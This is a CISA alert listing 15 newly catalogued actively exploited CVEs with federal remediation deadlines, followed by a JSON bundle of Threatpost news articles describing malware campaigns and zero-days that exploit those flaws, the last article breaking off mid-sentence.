CISA has added 15 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.
**CVE Number** | **CVE Title** | **Remediation Due Date**
---|---|---
CVE-2021-36934
|
Microsoft Windows SAM Local Privilege Escalation Vulnerability
|
2/24/2022
CVE-2020-0796
|
Microsoft SMBv3 Remote Code Execution Vulnerability
|
8/10/2022
CVE-2018-1000861
|
Jenkins Stapler Web Framework Deserialization of Untrusted Data Vulnerability
|
8/10/2022
CVE-2017-9791
|
Apache Struts 1 Improper Input Validation Vulnerability
|
8/10/2022
CVE-2017-8464
|
Microsoft Windows Shell (.lnk) Remote Code Execution Vulnerability
|
8/10/2022
CVE-2017-10271
|
Oracle Corporation WebLogic Server Remote Code Execution Vulnerability
|
8/10/2022
CVE-2017-0263
|
Microsoft Win32k Privilege Escalation Vulnerability
|
8/10/2022
CVE-2017-0262
|
Microsoft Office Remote Code Execution Vulnerability
|
8/10/2022
CVE-2017-0145
|
Microsoft SMBv1 Remote Code Execution Vulnerability
|
8/10/2022
CVE-2017-0144
|
Microsoft SMBv1 Remote Code Execution Vulnerability
|
8/10/2022
CVE-2016-3088
|
Apache ActiveMQ Improper Input Validation Vulnerability
|
8/10/2022
CVE-2015-2051
|
D-Link DIR-645 Router Remote Code Execution
|
8/10/2022
CVE-2015-1635
|
Microsoft HTTP.sys Remote Code Execution Vulnerability
|
8/10/2022
CVE-2015-1130
|
Apple OS X Authentication Bypass Vulnerability
|
8/10/2022
CVE-2014-4404
|
Apple OS X Heap-Based Buffer Overflow Vulnerability
|
8/10/2022
[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information.
Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>).
This product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.
**Please share your thoughts.**
We recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/02/10/cisa-adds-15-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.
{"threatpost": [{"lastseen": "2020-10-16T22:40:45", "description": "Security experts have identified a self-propagating malware, dubbed Lucifer, that targets Windows systems with cryptojacking and distributed denial-of-service (DDoS) attacks.\n\nThe never-before-seen malware initially tries to infect PCs by bombarding them with exploits in hopes of taking advantage of an \u201cexhaustive\u201d list of unpatched vulnerabilities. While patches for all the critical and high-severity bugs exist, the various companies impacted by the malware had not applied the fixes.\n\n\u201cLucifer is a new hybrid of cryptojacking and DDoS malware variant that leverages old vulnerabilities to spread and perform malicious activities on Windows platforms,\u201d said researchers with Palo Alto Networks\u2019 Unit 42 team, on[ Wednesday in a blog post](<https://unit42.paloaltonetworks.com/lucifer-new-cryptojacking-and-ddos-hybrid-malware/>). \u201cApplying the updates and patches to the affected software are strongly advised.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities targeted by Lucifer include Rejetto HTTP File Server ([CVE-2014-6287](<https://nvd.nist.gov/vuln/detail/CVE-2014-6287>)), Oracle Weblogic ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)), ThinkPHP RCE ([CVE-2018-20062](<https://nvd.nist.gov/vuln/detail/CVE-2018-20062>)), Apache Struts ([CVE-2017-9791](<https://nvd.nist.gov/vuln/detail/CVE-2017-9791>)), Laravel framework [CVE-2019-9081](<https://nvd.nist.gov/vuln/detail/CVE-2019-9081>)), and Microsoft Windows ([CVE-2017-0144](<https://nvd.nist.gov/vuln/detail/CVE-2017-0144>), [CVE-2017-0145](<https://nvd.nist.gov/vuln/detail/CVE-2017-0145>), and [CVE-2017-8464](<https://nvd.nist.gov/vuln/detail/CVE-2017-8464>)).\n\nAfter successfully exploiting these flaws, the attacker then connects to the command-and-control (C2) server and executes arbitrary commands on the vulnerable device, said researchers. These commands include performing a TCP, UDP or HTTP [DoS attack](<https://threatpost.com/massive-ddos-amazon-telecom-infrastructure/150096/>). Other commands allow the malware to drop an [XMRig miner](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and launch [cryptojacking attacks](<https://threatpost.com/hackers-exploit-critical-flaw-in-ghost-platform-with-cryptojacking-attack/155431/>), as well as collecting interface info and sending the miner status to the C2. Researchers say that as of Wednesday, the XMR wallet has paid 0.493527 XMR (approximately $32).\n\nThe malware is also capable of self-propagation through various methods.\n\nIt scans either for open instances of TCP port 1433 or Remote Procedure Call (RPC) port 135. If either of these are open, the malware attempts to brute-force the login using a default administrator username and an embedded password list (a full list of the passwords used can be found on Unit 42\u2019s analysis). It then copies and runs the malware binary on the remote host upon successful authentication.\n\nIn addition to brute-forcing credentials, the malware leverages exploitation for self-propagation. If the Server Message Block (SMB) protocol (a network file sharing protocol) is open, Lucifer executes several backdoors. These include the [EternalBlue](<https://threatpost.com/tag/eternalblue/>), [EternalRomance](<https://threatpost.com/eternalromance-exploit-found-in-bad-rabbit-ransomware/128645/>), and [DoublePulsar](<https://threatpost.com/nsas-doublepulsar-kernel-exploit-in-use-internet-wide/125165/>) exploits.\n\nOnce these three exploits have been used, the certutil utility is then used to propagate the malware. Certutil.exe is a command-line program, installed as part of Certificate Services, that can be used to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates.\n\nLucifer has been discovered in a series of recent attacks that are still ongoing. The first wave occurred on June 10. The attackers then resumed their campaign on June 11 with an upgraded version of the malware. Researchers say these updates include the addition of an anti-sandbox capability, an anti-debugger technique, and new checks for device drivers, DLLs and virtual devices.\n\nThese added capabilities show that the malware is growing in sophistication, researchers warn. They say, enterprises can protect themselves with simply security measures such as applying patches and strengthening passwords.\n\n\u201cWhile the vulnerabilities abused and attack tactics leveraged by this malware are nothing original, they once again deliver a message to all organizations, reminding them why it\u2019s utterly important to keep systems up-to-date whenever possible, eliminate weak credentials, and have a layer of defenses for assurance,\u201d stressed researchers.\n\n_This article was updated on June 25 to reflect the accurate conversion of XMR to USD._\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-24T21:20:16", "type": "threatpost", "title": "Self-Propagating Lucifer Malware Targets Windows Systems", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-6287", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-10271", "CVE-2017-8464", "CVE-2017-9791", "CVE-2018-20062", "CVE-2019-9081"], "modified": "2020-06-24T21:20:16", "id": "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "href": "https://threatpost.com/self-propagating-lucifer-malware-targets-windows-systems/156883/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-04-25T05:50:11", "description": "The ShadowBrokers\u2019 release of a trove of National Security Agency exploits last year appears to be the gift that keeps on giving, to the hacker community at least: A fresh malware that uses the EternalRomance tool has hit the scene, with Monero-mining as the stated goal. However, more damaging follow-on attacks are likely the endgame.\n\nThe bad code is a Python-based cryptocurrency mining malware, according to Fortinet\u2019s FortiGuard Labs, which first [discovered it](<https://www.fortinet.com/blog/threat-research/python-based-malware-uses-nsa-exploit-to-propagate-monero--xmr--.html>) this month. Because the malware uses the EternalRomance exploit, the researchers have given it the snappy name of \u201cPyRoMine.\u201d\n\nThe malware can be downloaded as an executable file compiled with PyInstaller, which is a program that packages code written in Python into stand-alone executables. This means that, conveniently, there is no need to install Python on the machine in order to execute the Python-based PyRoMine. Once installed, it sets about silently stealing CPU resources from unwitting victims to aim its proverbial drill bit at uncovering Monero profits.\n\n\u201cWe don\u2019t know for sure how it arrives on a system, but considering that this is the type of malware that needs to be mass distributed, it is safe to assume that it arrives via spam email or drive-by-download,\u201d FortiGuard security researcher Jasper Manuel said in an email interview.\n\nWorryingly, PyRoMine also sets up a hidden default account on the victimized machine with system administrator privileges, using the password \u201cP@ssw0rdf0rme.\u201d It\u2019s likely that this would be used for re-infection and further attacks, according to Manuel.\n\n\u201cIt is fairly likely that future attacks could happen,\u201d he told Threatpost. \u201cAlthough this malware is not a botnet because it doesn\u2019t phone home to report an infection and doesn\u2019t wait for commands, it still sets up an account on the affected machine and enables Remote Desktop Protocol. The attackers could use the same channel to connect to the machine using the created account to do further attacks.\u201d\n\n**Ripe for Spreading**\n\nBased on the earnings that PyRoMine has so to date (only about $650), it hasn\u2019t exactly lived up to its name and caught fire on the propagation front. But that could rapidly change: For one, the choice of Monero indicates that the criminals are looking to cast a wide net, given that the currency offers an important \u201cfeature\u201d that make it more suitable to the mass market than the more venerable Bitcoin: It relies on a proof-of-work algorithm called CryptoNight, designed for ordinary computers and even mobile phones, rather than for high-end GPUs or the specialized hardware needed for efficient Bitcoin mining. Thus, the potential attack surface consists of consumers and businesses alike, globally.\n\nSecondly, cybercriminals have discovered that enterprises and individuals have been pretty slow when it comes to patching the known vulnerabilities that the NSA tools leverage.\n\nThe ShadowBrokers [leaked a whole treasure chest](<https://threatpost.com/shadowbrokers-put-price-on-monthly-zero-day-leaks/125960/>) of hacking tools and zero-day exploits in 2017, attributed to the Equation Group, which is believed to be an arm of the NSA\u2019s Tailored Access Operations unit. They target Windows XP/Vista/8.1/7/10 and Windows Server 2003/2008/2012/2016, taking advantage of a pair of vulnerabilities, CVE-2017-0144 and CVE-2017-0145. Microsoft [patched these very quickly](<https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010>) after the tools were made public.\n\n\u201cThe patch for EternalRomance was released a year ago, but many still don\u2019t think proactive about security,\u201d Manuel told Threatpost. \u201cThe fact that cybercriminals use these exploits tells us that they still profit by using these exploits in their malware.\u201d\n\nAnd finally, EternalRomance is a remote code execution (RCE) exploit that abuses the legacy SMBv1 file-sharing protocol. SMBv1 is typically used only within the local area network of a business, but all too often it\u2019s left exposed to the internet \u2013one of the contributing factors as to why the EternalX attacks WannaCry and NotPetya [were able to spread so widely](<https://threatpost.com/complex-petya-like-ransomware-outbreak-worse-than-wannacry/126561/>).\n\n\u201cIn the past, we have seen that these exploits were used by state-sponsored threat actors,\u201d Manuel told us. \u201cWithin days of the release, we started seeing these exploits being used by commodity malware like cryptominers and info-stealers to target general victims.\u201d\n\nPyRoMine isn\u2019t the first miner to use the NSA tools: Researchers have discovered malware authors using the EternalBlue exploit in other cryptocurrency mining malware, such as [Adylkuzz](<https://threatpost.com/cryptocurrency-mining-malware-hosted-in-amazon-s3-bucket/127643/>), [Smominru](<https://threatpost.com/massive-smominru-cryptocurrency-botnet-rakes-in-millions/129726/>) and [WannaMine](<https://threatpost.com/cryptomining-gold-rush-one-gang-rakes-in-7m-over-6-months/130232/>) \u2013 with great success.\n\nManuel added that because the patch rate is clearly low for the leveraged vulnerabilities, he expects commodity malware to continue to use the NSA exploits for some time to come. More concerning, PyRoMine\u2019s backdoor strategy could become a hallmark going forward.\n\n\u201cI think is going to be something that we see much more of in the future as the tools that are being deployed are multi-faceted,\u201d said Chris Roberts, chief security architect at Acalvio, in an emailed comment. \u201cIn this case, it\u2019s not only mining and disabling security services. It\u2019s also adding itself into several account types, opening up RDP (3389) and basically laying the welcome mat out for future attacks. Several of the latest tool sets are coming armed with various payloads that simply have functionality to deploy attacks, harvest for data and also take advantage of lax security and processing time. And, this all comes in a nice, neat package using the simple issue that we (the human) haven\u2019t patched or don\u2019t pay attention to what we are downloading/clicking. Once again, we are the attack vector and the computer suffers.\u201d\n", "cvss3": {}, "published": "2018-04-26T18:21:13", "type": "threatpost", "title": "PyRoMine Uses NSA Exploit for Monero Mining and Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "modified": "2018-04-26T18:21:13", "id": "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "href": "https://threatpost.com/pyromine-uses-nsa-exploit-for-monero-mining-and-backdoors/131472/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-01-28T21:55:45", "description": "Researchers have identified an updated malware variant used by the cybercrime gang Rocke Group that targets cloud infrastructures with crypto-jacking attacks.\n\nThe malware is called Pro-Ocean, which was first discovered in 2019, and has now been beefed-up with \u201cworm\u201d capabilities and rootkit detection-evasion features.\n\n\u201cThis malware is an example that demonstrates that cloud providers\u2019 agent-based security solutions may not be enough to prevent evasive malware targeted at public cloud infrastructure,\u201d said Aviv Sasson with Palo Alto Networks [on Thursday](<https://unit42.paloaltonetworks.com/pro-ocean-rocke-groups-new-cryptojacking-malware/>). \u201cAs we saw, this sample has the capability to delete some cloud providers\u2019 agents and evade their detection.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nSince [its discovery in 2018](<https://threatpost.com/new-threat-actor-rocke-a-rising-monero-cryptomining-menace/137090/>), the Rocke Group has widened its [targeting of cloud applications](<https://threatpost.com/cryptomining-malware-uninstalls-cloud-security-products/140959/>) \u2013 including Apache ActiveMQ, Oracle WebLogic and open-source data structure store Redis \u2013 for mining Monero. Researchers say that since these attacks initially broke out, many cybersecurity companies have kept Pro-Ocean on their radar. Rocke Group\u2019s latest update aims to sidestep these detection and mitigation efforts.\n\n## **Pro-Ocean Malware**\n\nPro-Ocean uses a variety of known vulnerabilities to target cloud applications. These include a [critical flaw in Apache ActiveMQ](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>) (CVE-2016-3088) and [a high-severity vulnerability](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>) in Oracle WebLogic (CVE-2017-10271). The malware has also been spotted targeting unsecure instances of Redis.\n\nOnce downloaded, the malware attempts to remove other malware and cryptominers, including [Luoxk](<https://blog.netlab.360.com/malicious-campaign-luoxk-is-actively-exploiting-cve-2018-2893/>), [BillGates](<https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/bill-gates-botnet-threat-advisory.pdf>), [XMRig](<https://threatpost.com/new-cryptominer-distributes-xmrig-in-aggressive-attacks/132027/>) and [Hashfish](<https://virus-removal-guide.net/34710-is-the-hashfish-exe-file-legal-how-to-remove-hashfish-exe-trojan-coinminer/>). It then kills any processes using the CPU heavily, so that its XMRig miner can utilize 100 percent of the CPU juice needed to sow Monero.\n\nThe malware is made up of four components: A rootkit module that installs a rootkit and other various malicious services; a mining module that runs the XMRig miner; a Watchdog module that executes two Bash scripts (these check that the malware is running and search any processes using CPU heavily); and an infection module that contains \u201cworm\u201d capabilities.\n\n## **New Features**\n\nThe latter \u201cworm\u201d feature is a new add for Pro-Ocean, which previously only infected victims manually. The malware now uses a Python infection script to retrieve the public IP address of the victim\u2019s machine. It does so by accessing an online service with the address \u201cident.me,\u201d which scopes out IP addresses for various web servers. Then, the script tries to infect all the machines in the same 16-bit subnet (e.g. 10.0.X.X).\n\n\u201cIt does this by blindly executing public exploits one after the other in the hope of finding unpatched software it can exploit,\u201d said Sasson.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/01/28143636/word-image-4.png>)\n\nPro-Ocean\u2019s modular structure. Credit: Palo Alto Networks\n\nOther threat groups have previously adopted worm-like functionality into their Monero-chugging malware. TeamTNT\u2019s cryptomining worm, for instance, [was found spreading through](<https://threatpost.com/aws-cryptojacking-worm-cloud/158427/>) the Amazon Web Services (AWS) cloud and collecting credentials in August.\n\nThe Pro-Ocean malware has also added mew rootkit capabilities that cloak its malicious activity.\n\nThese updated features exist in [Libprocesshider](<https://github.com/gianlucaborello/libprocesshider>), a library for hiding processes used by the malware. This library was utilized by previous versions of Pro-Ocean \u2013 however, in the new version, the developer of the code has added several new code snippets to the library for further functionalities.\n\nFor example, before calling the libc function open (libc is a library of standard functions that can be used by all C programs), a malicious function determines whether the file needs to be hidden to obfuscate malicious activities.\n\n\u201cIf it determines that the file needs to be hidden, the malicious function will return a \u2018No such file or directory\u2019 error, as if the file in question does not exist,\u201d said Sasson.\n\nResearchers said they believe that the Rocke Group will continue to actively update its malware, particularly as the [cloud grows as a lucrative target for attackers](<https://threatpost.com/cloud-attacks-bypass-mfa-feds/163056/>).\n\n\u201cCryptojacking malware targeting the cloud is evolving as attackers understand the potential of that environment to mine for crypto coins. We previously saw simpler attacks by the Rocke Group, but it seems this group presents an ongoing, growing threat. This cloud-targeted malware is not something ordinary since it has worm and rootkit capabilities. We can assume that the growing trend of sophisticated attacks on the cloud will continue.\u201d\n\n**Download our exclusive **[**FREE Threatpost Insider eBook**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=FEATURE&utm_medium=FEATURE&utm_campaign=Nov_eBook>) [_**Healthcare Security Woes Balloon in a Covid-Era World**_](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)** , sponsored by ZeroNorth, to learn more about what these security risks mean for hospitals at the day-to-day level and how healthcare security teams can implement best practices to protect providers and patients. Get the whole story and **[**DOWNLOAD the eBook now**](<https://threatpost.com/ebooks/healthcare-security-woes-balloon-in-a-covid-era-world/?utm_source=ART&utm_medium=ART&utm_campaign=Nov_eBook>)**\u2013 on us!**\n", "cvss3": {}, "published": "2021-01-28T20:06:57", "type": "threatpost", "title": "Rocke Group\u2019s Malware Now Has Worm Capabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2016-3088", "CVE-2017-10271", "CVE-2018-2893"], "modified": "2021-01-28T20:06:57", "id": "THREATPOST:D3FA06D667A0B326C1598C8BCD106E7D", "href": "https://threatpost.com/rocke-groups-malware-now-has-worm-capabilities/163463/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2018-10-06T22:53:43", "description": "Microsoft patched three zero day vulnerabilities actively under attack today as part of its [May Patch Tuesday release](<https://technet.microsoft.com/en-us/security/advisories>).\n\n[Researchers](<https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html>) with FireEye who uncovered the three vulnerabilities said the bugs were actively being exploited by threat actors Turla and APT28.\n\nTwo of the zero day vulnerabilities ([CVE-2017-0261](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0261>) and [CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>)) were remote code execution (RCE) bugs related to how Microsoft\u2019s Office suite handled Encapsulated PostScript (EPS). FireEye said the third zero day vulnerability was tied to Windows and is an escalation of privilege vulnerability ([CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)).\n\nAccording to security experts the RCE bugs could be triggered by simply viewing a malicious image in any number of Microsoft Office applications. The elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, according to Microsoft.\n\n\u201cAn attacker who successfully exploited this vulnerability (CVE-2017-0263) could run arbitrary code in kernel mode. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d Microsoft said.\n\nIn total, Microsoft released patches for 55 unique CVEs for Internet Explorer, Edge, Office, Windows and the .NET Framework as part of its May Patch Tuesday release. Fourteen of vulnerabilities were rated critical.\n\n\u201cThe use of zero-day exploits by Turla Group and APT28 underscores their capacity to apply technically sophisticated and costly methods when necessary,\u201d said Ben Read, a cyber espionage analyst with FireEye who co-authored the blog.\n\n\u201cAPT28\u2019s use of two zero days ([CVE-2017-0262](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0262>) and [CVE-2017-0263](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-0263>)) continues to demonstrate they are a very capable actor. Some of the talk about them doing less technically sophisticated credential theft, shows they can bring the fast ball when they need to against a harder target,\u201d Read said in an interview with Threatpost.\n\nHe added that CVE-2017-0261 is being used by both a nation state (Turla) and an unidentified financially motivated group. This, he said, illustrated a dynamic vulnerability market where both nation states and criminals are buying from the same vendors.\n\nIn April, researchers at Kaspersky Lab said there was a link between [Moonlight Maze cyberespionage operation of the mid- and late-1990s](<https://threatpost.com/russian-speaking-turla-joins-apt-elite/124695/>) and the modern-day [Turla APT](<https://threatpost.com/agent-btz-malware-may-have-served-as-starting-point-for-red-october-turla/104735/>). The malware hides on infected systems, steals data and sends it off to a remote server, much like other cyber espionage tools. In December, the Federal Bureau of Investigation and the US Department of Homeland Security implicated hacking group APT28 (also known as Fancy Bear and Sofacy) in attacks [against several election-related targets](<https://threatpost.com/fbi-dhs-report-links-fancy-bear-to-election-hacks/122802/>).\n\nThe three zero day vulnerabilities come on the [heels of Microsoft issuing an emergency out-of-band patch](<https://threatpost.com/emergency-update-patches-zero-day-in-microsoft-malware-protection-engine/125529/>) for a zero day reported by Google Project Zero in Microsoft\u2019s Malware Protection Engine on Monday.\n\nAlso part of Patch Tuesday were updates to Microsoft Edge and Internet Explorer 11 to [block sites that are protected with a SHA-1 certificate](<https://technet.microsoft.com/library/security/4010323>) from loading and to display an invalid certificate warning.\n\n\u201cThis change will only impact SHA-1 certificates that chain to a root in the Microsoft Trusted Root Program where the end-entity certificate or the issuing intermediate uses SHA-1. Enterprise or self-signed SHA-1 certificates will not be impacted, although we recommend that all customers quickly migrate to SHA-2 based certificates,\u201d Microsoft wrote.\n\nFor the past couple of years, browser makers have raced to [migrate from SHA-1 to SHA-2 as](<https://threatpost.com/sha-1-end-times-have-arrived/123061/>) researchers have intensified warnings about collision attacks moving from theoretical to practical. Browser makers Google and Mozilla have already begun the deprecation of SHA-1.\n\nThe Microsoft updates follow in the footsteps of Adobe, who earlier in the day released a surprisingly small update, [patching just eight vulnerabilities](<https://threatpost.com/adobe-patches-seven-critical-vulnerabilities-in-flash-aem/125539/>).\n", "cvss3": {}, "published": "2017-05-09T17:16:48", "type": "threatpost", "title": "Microsoft Plugs Three Zero Day Holes as Part of May Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-0261", "CVE-2017-0262", "CVE-2017-0263"], "modified": "2017-05-17T13:04:46", "id": "THREATPOST:FC2B25371317ED019A81553465477089", "href": "https://threatpost.com/microsoft-plugs-three-zero-day-holes-as-part-of-may-patch-tuesday/125544/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-07-22T20:05:59", "description": "A privilege escalation bug, affecting versions of Windows 10, received a workaround fix by Microsoft Wednesday to prevent attackers from accessing data and creating new accounts on compromised systems.\n\nThe bug, dubbed SeriousSAM, affects the Security Accounts Manager (SAM) database in all versions of Windows 10. The SAM component in Windows houses user account credentials and network domain information \u2013 a juicy target for attackers. A prerequisite for abuse of the bug is an adversary needs either remote or local access to the vulnerable Windows 10 system.\n\nTracked as CVE-2021-36934, Microsoft said the vulnerability exists because of overly permissive Access Control Lists on multiple system files, including the (SAM) database. \u201cAn attacker who successfully exploited this vulnerability could run arbitrary code with SYSTEM privileges. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights,\u201d the [Microsoft bulletin explains](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36934>). \n[](<https://threatpost.com/newsletter-sign/>)Simply stated, an attacker could leverage the bug to gain access to the SAM database of hashed credentials, which then could be decrypted offline and used to bypass Windows 10 user access controls.\n\n## Proof-of-Concept Available\n\nThe bug is rated important in severity by Microsoft. The flaw was revealed to Microsoft by researchers Jonas Lyk over the weekend and made public Monday. [Proof-of-concept code](<https://github.com/GossiTheDog/HiveNightmare>) was published by researcher Kevin Beaumont to help network admins identify exposure to the bug.\n\nIn a Tweet by Lyk, the researcher said the bug also impacts pre-production versions of Windows 11 (slated to be released in October, 2021). \u201cFor some reason on win11 the SAM file now is READ for users. So if you have shadowvolumes enabled you can read the sam file,\u201d [he tweeted](<https://twitter.com/jonasLyk/status/1417205166172950531>).\n\nThe researcher said the bug was discovered while tinkering with Windows 11. He explains that SAM database content, while not accessible on the OS, can be accessed when part of a Windows Shadow Volume Copy (VSS) backup. VSS is a service that allows automatic or manual real-time backups of system files (preserved in their current state) tied to a particular drive letter (volume).\n\nHe later identified the same issue is present on Windows 10 systems dating back to 2018 (v1809).\n\n## **No Patch Available: Workaround Fix Recommended**\n\nFor this reason, Microsoft is recommending sysadmin delete the backup copies of the VSS files. The OS maker does not offer a patch for the bug, rather a simple workaround.\n\nMicrosoft explains the two step process as: \u201cDelete any System Restore points and Shadow volumes that existed prior to restricting access to %windir%\\system32\\config\u201d and \u201ccreate a new System Restore point (if desired).\u201d\n\nIt also cautions that deleting VSS shadow copies \u201ccould impact restore operations, including the ability to restore data with third-party backup applications.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-22T12:57:11", "type": "threatpost", "title": "Microsoft Issues Windows 10 Workaround Fix for \u2018SeriousSAM\u2019 Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36934"], "modified": "2021-07-22T12:57:11", "id": "THREATPOST:B0D084253CDDA9B0416ADB6DC22BEC9B", "href": "https://threatpost.com/win-10-serioussam/168034/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-30T05:51:02", "description": "Researchers have discovered a new sophisticated malware family in the wild, which wrecks havoc on Windows and Linux systems with a combination of data destructive ransomware and malicious cryptomining.\n\nThe malware, dubbed by Palo Alto Networks\u2019 Unit 42 researchers who discovered it as Xbash, has been targeting weak passwords and unpatched vulnerabilities to infect systems. Xbash also shares striking similarities to worms like WannaCry and Petya/NotPetya, such as self-propagation capabilities and its ability to rapidly spread.\n\n\u201cXbash aimed on discovering unprotected services, deleting victim\u2019s MySQL, PostgreSQL and MongoDB databases, and ransom for Bitcoins,\u201d the researchers said in a Monday [post](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/>). \u201cXbash uses three known vulnerabilities in Hadoop, Redis and ActiveMQ for self-propagation or infecting Windows system.\u201d\n\nXbash has an array of features that make it stand out. It specifically targets Windows and Linux, it\u2019s developed in Python, it fetches IP addresses and domain names from its C2 servers for exploiting, and it has intranet scanning functionality.\n\nResearchers discovered four different versions of Xbash so far. All have an array of sophisticated capabilities, including quick development (using Python), easy installation, anti-detection features and cross-platform capabilities. Despite this high level of sophistication, researchers said that code and timestamp differences among the four versions show that the malware is still under active development.\n\nThe botnet began to operate since as early as May 2018, and so far, researchers said they observed 48 incoming transactions to the Bitcoin wallet addresses (totaling $6,000 total) used by the malware \u2013 possibly indicating 48 victims of its ransom behavior.\n\n## Attack Vector\n\nThe malware focuses on three known vulnerabilities: A Hadoop YARN ResourceManager unauthenticated command execution flaw (discovered in 2016 with no CVE), a Redis arbitrary file write and remote command execution glitch (found in 2015 with no CVE), and ActiveMQ arbitrary file write vulnerability ([CVE-2016-3088](<https://nvd.nist.gov/vuln/detail/CVE-2016-3088>)).\n\nXbash offers two separate functions for Windows and Linux targets \u2013 the malware is capable of understanding the operating system of a targeted system and delivering a payload designed for that OS.\n\nIt appears that on Windows, Xbash will focus on malicious cryptomining functions and self-propagation techniques, while on Linux systems, the malware will flaunt its data destructive tendencies; as the malware triggers a downloader to execute a coinminer on Windows, while on Linux it flaunts ransomware functions.\n\nOn Linux, Xbash first attempts to log in to a service \u2013 generally MySQL, MongoDB, and PostgreSQL. Once successfully logged in, it will delete almost all existing databases in the server and create a new database named \u201cPLEASE_READ_ME_XYZ.\u201d It will then insert a ransom message into a table labeled \u201cWARNING\u201d in the new database\n\nThe ransomware message asks for .02 BTC, or around $125, as a payment to release the compromised databases.\n\nOn Windows, the malware will execute a JavaSCript or VBScript downloader. The downloader in turn calls on a coinminer to be executed onto the system: \u201cDepending on Xbash\u2019s version, this new startup item will download a malicious HTML or a Scriptlet file from Xbash\u2019s C2 server, and to execute the JavaScript or VBScript code in the file via \u201cmshta\u201d or via \u201cregsvr32\u2033. These scripts will then invoke PowerShell to download a malicious PE executable or PE DLL file,\u201d researchers said.\n\nHowever, Unit 42 researchers said that they have no found evidence of code in Xbash that back up deleted databases at all \u2013 meaning that the malicious malware poses as ransomware, but still destructs databases after the ransom has been paid.\n\nAnalysis shows that the malware is likely linked to Iron Group, a group publicly linked to other ransomware campaigns including those that use the Remote Control System (RCS), whose source code was believed to be stolen from the HackingTeam in 